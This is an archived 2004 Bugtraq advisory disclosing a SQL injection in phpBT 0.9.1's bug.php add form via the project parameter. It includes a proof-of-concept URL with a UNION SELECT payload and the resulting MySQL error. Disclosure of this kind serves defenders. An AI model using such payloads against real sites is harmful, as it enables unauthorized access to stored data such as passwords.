lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20041112225005.28250.qmail@www.securityfocus.com>
Date: 12 Nov 2004 22:50:05 -0000
From: "Jérôme" ATHIAS <jerome@...ias.fr>
To: bugtraq@...urityfocus.com
Subject: SQL Injection in phpBT (bug.php - Add)




 _   _                ______           _    
| | | |               |  _  \         | |   
| |_| | _____      __ | | | |__ _ _ __| | __
|  _  |/ _ \ \ /\ / / | | | / _` | '__| |/ /
| | | | (_) \ V  V /  | |/ / (_| | |  |   < 
\_| |_/\___/ \_/\_/   |___/ \__,_|_|  |_|\_\

http://www.howdark.com

----------------------------------------------------------------------------------------------------------------------------------
// Information
----------------------------------------------------------------------------------------------------------------------------------

Author:	How Dark
Date:	November 13, 2004
URL:	http://www.howdark.com

Affected Software:		PHP Bug Traq
Software Version:		0.9.1
Software URL:		http://phpbt.sourceforge.net/

Attack:			SQL Injection, allowing people to minipulate the query into pulling data
			they should not previously be able too obtain. (Such as passwords)


Description:		project variable is left open..

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// Description
----------------------------------------------------------------------------------------------------------------------------------

When forms come up for you to add a bug, the project selection is open
to sql injection.

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// URL
----------------------------------------------------------------------------------------------------------------------------------

bug.php?op=add&project=
bug.php?op=add&project=0%20union%20select%201

----------------------------------------------------------------------------------------------------------------------------------

xxx

----------------------------------------------------------------------------------------------------------------------------------
// SQL Error
----------------------------------------------------------------------------------------------------------------------------------

DB Error: syntax error
select project_name from project where project_id = \' [nativecode=1064 ** You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1]

----------------------------------------------------------------------------------------------------------------------------------

xxx

;eof

Regards to The Angel ;p
Jerome - The Watcher


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ